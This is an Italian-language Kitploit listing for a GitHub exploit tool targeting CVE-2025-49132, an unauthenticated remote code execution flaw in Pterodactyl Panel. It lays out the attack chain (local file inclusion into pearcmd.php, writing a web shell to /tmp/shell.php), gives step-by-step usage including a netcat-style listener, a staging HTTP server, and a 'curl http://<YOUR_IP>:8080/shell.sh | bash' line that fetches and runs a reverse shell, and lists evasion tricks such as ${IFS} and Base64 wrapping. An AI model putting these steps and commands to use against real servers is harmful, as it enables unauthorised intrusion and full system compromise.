Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-49132-Mods | Kitploit
Strumenti/GitHubGitHub/malw0re/cve-2025-49132-mods
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingStrumento di Accesso Remoto
GitHubmalw0re/cve-2025-49132-mods

CVE-2025-49132-Mods

Vedi Repository
1226 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-49132 - RCE Semplice

Python CVE

📝 Panoramica

Questo repository contiene un exploit specializzato per CVE-2025-49132, una vulnerabilità critica di Remote Code Execution (RCE) non autenticata nel Pterodactyl Panel (versioni precedenti alla v1.11.11).

La vulnerabilità è presente nell'endpoint /locales/locale.json. Manipolando i parametri di query locale e namespace, un attaccante può sfruttare una Local File Inclusion (LFI) per interagire con pearcmd.php. Ciò consente la creazione arbitraria di file e l'esecuzione di comandi, portando a una compromissione totale del sistema.

⚙️ Catena dell'Exploit

Lo script ape.py automatizza i seguenti passaggi:

Individuazione di PEAR: esegue il fuzzing della struttura delle directory per individuare l'installazione di PEAR sul target.

Creazione della backdoor: utilizza config-create di PEAR per scrivere una web shell persistente in /tmp/shell.php.

🚀 Istruzioni per l'Uso

Per ottenere un callback riuscito sul target, segui questo flusso di lavoro:

  1. Preparazione Listener: avvia Penelope (o il tuo listener preferito) in un terminale separato:

penelope -p 4444

Server di staging: se utilizzi uno script shell personalizzato, ospitalo tramite Python: python3 -m http.server 8080

  1. Esecuzione Esegui lo script in modalità interattiva per mantenere il controllo sul processo di sfruttamento:

python3 ape.py --host xxx.xxx.xxx --interactive

  1. Cattura della Shell All'interno del prompt shell>, usa il seguente comando per eseguire il tuo payload staged:

shell> curl http://<YOUR_IP>:8080/shell.sh | bash

🛡️ Salvaguardie Tecniche

Bypass degli spazi: utilizza automaticamente ${IFS} per garantire che i payload superino il parsing dell'URL.

Wrapper Base64: avvolge i comandi della reverse shell in Base64 per prevenire l'alterazione dei caratteri da parte del server Nginx/Web del target.

Gestione del timeout: progettato per rilevare quando una reverse shell si è connessa con successo anche se la richiesta web si blocca.

Scarica lo strumento